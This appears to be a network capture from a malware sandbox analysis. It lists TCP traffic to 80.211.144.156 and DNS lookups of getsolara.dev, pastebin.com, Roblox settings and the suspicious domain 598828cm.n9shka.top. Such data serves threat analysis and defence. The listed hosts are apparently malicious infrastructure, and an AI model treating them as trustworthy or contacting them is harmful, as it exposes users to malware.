Sep 14, 2024 12:54:24.932081938 CEST	62851	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:24.932662964 CEST	62852	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:24.937366009 CEST	80	62851	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:24.937428951 CEST	62851	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:24.937525034 CEST	80	62852	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:24.937594891 CEST	62852	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:24.937675953 CEST	62852	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:24.942408085 CEST	80	62852	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:25.290755987 CEST	62852	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:25.415649891 CEST	80	62852	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:25.612818956 CEST	80	62852	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:25.665606022 CEST	62852	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:25.812776089 CEST	80	62852	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:25.868757010 CEST	62852	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:25.934437037 CEST	62852	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:25.935178041 CEST	62853	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:25.939672947 CEST	80	62852	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:25.939734936 CEST	62852	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:25.939999104 CEST	80	62853	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:25.940104961 CEST	62853	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:25.940253019 CEST	62853	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:25.945445061 CEST	80	62853	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:26.290714025 CEST	62853	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:26.603148937 CEST	62853	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:27.032875061 CEST	80	62853	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:27.033087015 CEST	80	62853	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:27.033157110 CEST	62853	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:27.306291103 CEST	62853	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:28.073745966 CEST	80	62853	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:28.073775053 CEST	80	62853	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:28.073846102 CEST	62853	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:28.074489117 CEST	62853	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:28.075757980 CEST	80	62853	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:28.077549934 CEST	80	62853	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:28.078263998 CEST	80	62853	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:28.355649948 CEST	80	62853	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:28.399990082 CEST	62853	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:28.484985113 CEST	62853	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:28.485645056 CEST	62854	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:28.490118027 CEST	80	62853	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:28.490219116 CEST	62853	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:28.490396976 CEST	80	62854	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:28.490483046 CEST	62854	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:28.490564108 CEST	62854	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:28.495349884 CEST	80	62854	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:28.837563038 CEST	62854	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:28.842448950 CEST	80	62854	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:29.012684107 CEST	62855	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:29.013493061 CEST	62854	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:29.017621994 CEST	80	62855	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:29.017755032 CEST	62855	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:29.017883062 CEST	62855	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:29.018580914 CEST	80	62854	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:29.018631935 CEST	62854	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:29.022680044 CEST	80	62855	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:29.153377056 CEST	62856	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:29.158231020 CEST	80	62856	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:29.158315897 CEST	62856	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:29.158464909 CEST	62856	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:29.163229942 CEST	80	62856	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:29.369018078 CEST	62855	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:29.374120951 CEST	80	62855	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:29.374370098 CEST	80	62855	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:29.509507895 CEST	62856	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:29.514354944 CEST	80	62856	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:29.681368113 CEST	80	62855	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:29.728321075 CEST	62855	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:29.808490038 CEST	80	62855	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:29.831511974 CEST	80	62856	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:29.853192091 CEST	62855	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:29.900024891 CEST	62856	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:29.962171078 CEST	80	62856	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:30.012464046 CEST	62856	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:30.121507883 CEST	62855	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:30.121769905 CEST	62856	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:30.122169971 CEST	62857	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:30.126658916 CEST	80	62855	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:30.126744986 CEST	62855	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:30.127068043 CEST	80	62857	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:30.127147913 CEST	62857	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:30.127202034 CEST	80	62856	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:30.127247095 CEST	62856	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:30.127327919 CEST	62857	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:30.132076025 CEST	80	62857	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:30.478286028 CEST	62857	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:30.483233929 CEST	80	62857	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:30.800896883 CEST	80	62857	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:30.853107929 CEST	62857	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:30.930233002 CEST	80	62857	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:30.978110075 CEST	62857	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:31.053829908 CEST	62858	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:31.058758974 CEST	80	62858	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:31.058882952 CEST	62858	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:31.059005022 CEST	62858	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:31.063906908 CEST	80	62858	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:31.415654898 CEST	62858	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:31.422013998 CEST	80	62858	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:31.730587959 CEST	80	62858	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:31.775023937 CEST	62858	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:31.860414982 CEST	80	62858	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:31.915581942 CEST	62858	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:31.987093925 CEST	62857	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:31.995014906 CEST	62858	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:31.995632887 CEST	62859	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:32.000142097 CEST	80	62858	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:32.000211954 CEST	62858	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:32.001060009 CEST	80	62859	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:32.001127005 CEST	62859	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:32.001293898 CEST	62859	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:32.007577896 CEST	80	62859	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:32.353195906 CEST	62859	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:32.518239021 CEST	80	62859	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:32.686450958 CEST	80	62859	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:32.881419897 CEST	80	62859	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:32.881517887 CEST	62859	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:33.007679939 CEST	62859	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:33.008059978 CEST	62860	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:33.012902021 CEST	80	62859	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:33.012918949 CEST	80	62860	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:33.013118029 CEST	62860	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:33.013150930 CEST	62859	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:33.013256073 CEST	62860	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:33.017997026 CEST	80	62860	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:33.368829966 CEST	62860	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:33.373783112 CEST	80	62860	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:33.706499100 CEST	80	62860	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:33.759357929 CEST	62860	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:33.842020035 CEST	80	62860	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:33.884433031 CEST	62860	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:33.961286068 CEST	62860	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:33.961713076 CEST	62861	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:34.275049925 CEST	62860	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:34.823143959 CEST	62862	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:34.884383917 CEST	62860	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:34.936444998 CEST	80	62861	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:34.936490059 CEST	80	62860	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:34.936528921 CEST	62861	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:34.936588049 CEST	80	62862	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:34.936636925 CEST	80	62860	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:34.936670065 CEST	62862	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:34.936718941 CEST	80	62860	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:34.936774969 CEST	62860	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:34.936907053 CEST	62862	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:34.942152023 CEST	80	62862	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:35.077255964 CEST	62863	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:35.082333088 CEST	80	62863	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:35.082427025 CEST	62863	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:35.082549095 CEST	62863	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:35.087539911 CEST	80	62863	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:35.290688038 CEST	62862	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:35.295614004 CEST	80	62862	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:35.295660019 CEST	80	62862	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:35.431312084 CEST	62863	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:35.436172009 CEST	80	62863	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:35.601670027 CEST	80	62862	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:35.649985075 CEST	62862	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:35.728421926 CEST	80	62862	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:35.764415979 CEST	80	62863	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:35.775011063 CEST	62862	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:35.806245089 CEST	62863	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:36.170259953 CEST	80	62863	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:36.171205044 CEST	80	62863	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:36.171325922 CEST	62863	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:36.295497894 CEST	62862	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:36.295553923 CEST	62863	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:36.296238899 CEST	62864	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:36.300765991 CEST	80	62862	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:36.301137924 CEST	80	62863	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:36.301153898 CEST	80	62864	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:36.301204920 CEST	62862	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:36.301220894 CEST	62863	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:36.301275015 CEST	62864	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:36.301388979 CEST	62864	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:36.306200027 CEST	80	62864	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:36.650084972 CEST	62864	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:36.654913902 CEST	80	62864	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:36.966149092 CEST	80	62864	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:37.009397984 CEST	62864	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:37.161189079 CEST	80	62864	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:37.212512016 CEST	62864	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:37.297454119 CEST	62864	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:37.298386097 CEST	62865	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:37.302561998 CEST	80	62864	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:37.302620888 CEST	62864	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:37.303208113 CEST	80	62865	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:37.303273916 CEST	62865	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:37.303347111 CEST	62865	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:37.308120012 CEST	80	62865	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:37.650106907 CEST	62865	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:37.655168056 CEST	80	62865	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:37.989903927 CEST	80	62865	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:38.040746927 CEST	62865	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:38.124530077 CEST	80	62865	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:38.181257010 CEST	62865	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:38.269315958 CEST	62865	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:38.270288944 CEST	62866	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:38.274852037 CEST	80	62865	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:38.275983095 CEST	80	62866	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:38.276055098 CEST	62865	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:38.276087046 CEST	62866	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:38.276174068 CEST	62866	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:38.280981064 CEST	80	62866	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:38.634526968 CEST	62866	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:38.639425039 CEST	80	62866	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:38.939486980 CEST	80	62866	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:38.993767023 CEST	62866	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:39.068399906 CEST	80	62866	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:39.118839025 CEST	62866	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:39.203093052 CEST	62866	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:39.203644037 CEST	62867	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:39.208230019 CEST	80	62866	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:39.208288908 CEST	62866	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:39.208420038 CEST	80	62867	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:39.208605051 CEST	62867	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:39.208765030 CEST	62867	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:39.213644028 CEST	80	62867	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:39.556346893 CEST	62867	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:39.561326027 CEST	80	62867	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:39.981513023 CEST	80	62867	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:40.025188923 CEST	62867	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:40.028269053 CEST	80	62867	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:40.071928024 CEST	62867	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:40.148134947 CEST	62867	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:40.148597956 CEST	62868	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:40.153232098 CEST	80	62867	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:40.153474092 CEST	80	62868	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:40.153572083 CEST	62867	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:40.153604031 CEST	62868	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:40.153672934 CEST	62868	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:40.158512115 CEST	80	62868	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:40.509540081 CEST	62868	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:40.514619112 CEST	80	62868	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:40.744879007 CEST	62869	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:40.745017052 CEST	62868	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:40.749849081 CEST	80	62869	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:40.750068903 CEST	80	62868	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:40.750155926 CEST	62868	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:40.750325918 CEST	62869	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:40.750325918 CEST	62869	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:40.755136013 CEST	80	62869	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:40.884404898 CEST	62870	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:40.889384031 CEST	80	62870	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:40.891247988 CEST	62870	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:40.891339064 CEST	62870	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:40.896172047 CEST	80	62870	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:41.103218079 CEST	62869	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:41.108163118 CEST	80	62869	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:41.108186007 CEST	80	62869	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:41.243894100 CEST	62870	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:41.248909950 CEST	80	62870	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:41.416115999 CEST	80	62869	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:41.462505102 CEST	62869	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:41.544501066 CEST	80	62869	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:41.555797100 CEST	80	62870	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:41.587517023 CEST	62869	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:41.603135109 CEST	62870	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:41.688481092 CEST	80	62870	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:41.743891001 CEST	62870	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:41.803246021 CEST	62869	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:41.803246021 CEST	62870	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:41.803714991 CEST	62871	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:41.808465958 CEST	80	62869	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:41.808526993 CEST	62869	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:41.808614969 CEST	80	62871	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:41.808692932 CEST	62871	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:41.808743000 CEST	80	62870	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:41.808798075 CEST	62870	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:41.808880091 CEST	62871	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:41.813723087 CEST	80	62871	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:42.165795088 CEST	62871	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:42.170701027 CEST	80	62871	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:42.482866049 CEST	80	62871	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:42.525068998 CEST	62871	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:42.618242025 CEST	80	62871	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:42.665656090 CEST	62871	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:42.746642113 CEST	62871	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:42.747143984 CEST	62872	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:42.752063036 CEST	80	62872	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:42.752209902 CEST	62872	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:42.752259970 CEST	80	62871	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:42.752290964 CEST	62872	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:42.752317905 CEST	62871	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:42.757067919 CEST	80	62872	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:43.103296041 CEST	62872	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:43.110903978 CEST	80	62872	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:43.444454908 CEST	80	62872	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:43.493838072 CEST	62872	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:43.578006029 CEST	80	62872	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:43.618793011 CEST	62872	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:43.713263988 CEST	62873	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:43.718194008 CEST	80	62873	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:43.718267918 CEST	62873	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:43.718357086 CEST	62873	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:43.723536015 CEST	80	62873	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:44.391542912 CEST	80	62873	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:44.431333065 CEST	62873	80	192.168.2.4	80.211.144.156

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 14, 2024 12:52:03.937227964 CEST	62354	53	192.168.2.4	1.1.1.1
Sep 14, 2024 12:52:04.004895926 CEST	53	62354	1.1.1.1	192.168.2.4
Sep 14, 2024 12:52:08.043596983 CEST	52167	53	192.168.2.4	1.1.1.1
Sep 14, 2024 12:52:08.050538063 CEST	53	52167	1.1.1.1	192.168.2.4
Sep 14, 2024 12:52:08.945014954 CEST	60304	53	192.168.2.4	1.1.1.1
Sep 14, 2024 12:52:09.010723114 CEST	53	60304	1.1.1.1	192.168.2.4
Sep 14, 2024 12:52:11.769407034 CEST	54395	53	192.168.2.4	1.1.1.1
Sep 14, 2024 12:52:11.875710964 CEST	53	54395	1.1.1.1	192.168.2.4
Sep 14, 2024 12:52:47.893438101 CEST	53	50980	162.159.36.2	192.168.2.4
Sep 14, 2024 12:52:49.297580957 CEST	53	65520	1.1.1.1	192.168.2.4
Sep 14, 2024 12:53:03.870498896 CEST	51517	53	192.168.2.4	1.1.1.1
Sep 14, 2024 12:53:04.323851109 CEST	53	51517	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 14, 2024 12:52:03.937227964 CEST	192.168.2.4	1.1.1.1	0x5c4f	Standard query (0)	getsolara.dev	A (IP address)	IN (0x0001)	false
Sep 14, 2024 12:52:08.043596983 CEST	192.168.2.4	1.1.1.1	0xafcd	Standard query (0)	pastebin.com	A (IP address)	IN (0x0001)	false
Sep 14, 2024 12:52:08.945014954 CEST	192.168.2.4	1.1.1.1	0x68ef	Standard query (0)	clientsettings.roblox.com	A (IP address)	IN (0x0001)	false
Sep 14, 2024 12:52:11.769407034 CEST	192.168.2.4	1.1.1.1	0x1480	Standard query (0)	www.nodejs.org	A (IP address)	IN (0x0001)	false
Sep 14, 2024 12:53:03.870498896 CEST	192.168.2.4	1.1.1.1	0x99c7	Standard query (0)	598828cm.n9shka.top	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 14, 2024 12:52:04.004895926 CEST	1.1.1.1	192.168.2.4	0x5c4f	No error (0)	getsolara.dev		172.67.203.125	A (IP address)	IN (0x0001)	false
Sep 14, 2024 12:52:04.004895926 CEST	1.1.1.1	192.168.2.4	0x5c4f	No error (0)	getsolara.dev		104.21.93.27	A (IP address)	IN (0x0001)	false
Sep 14, 2024 12:52:08.050538063 CEST	1.1.1.1	192.168.2.4	0xafcd	No error (0)	pastebin.com		104.20.3.235	A (IP address)	IN (0x0001)	false
Sep 14, 2024 12:52:08.050538063 CEST	1.1.1.1	192.168.2.4	0xafcd	No error (0)	pastebin.com		172.67.19.24	A (IP address)	IN (0x0001)	false
Sep 14, 2024 12:52:08.050538063 CEST	1.1.1.1	192.168.2.4	0xafcd	No error (0)	pastebin.com		104.20.4.235	A (IP address)	IN (0x0001)	false
Sep 14, 2024 12:52:09.010723114 CEST	1.1.1.1	192.168.2.4	0x68ef	No error (0)	clientsettings.roblox.com	titanium.roblox.com		CNAME (Canonical name)	IN (0x0001)	false
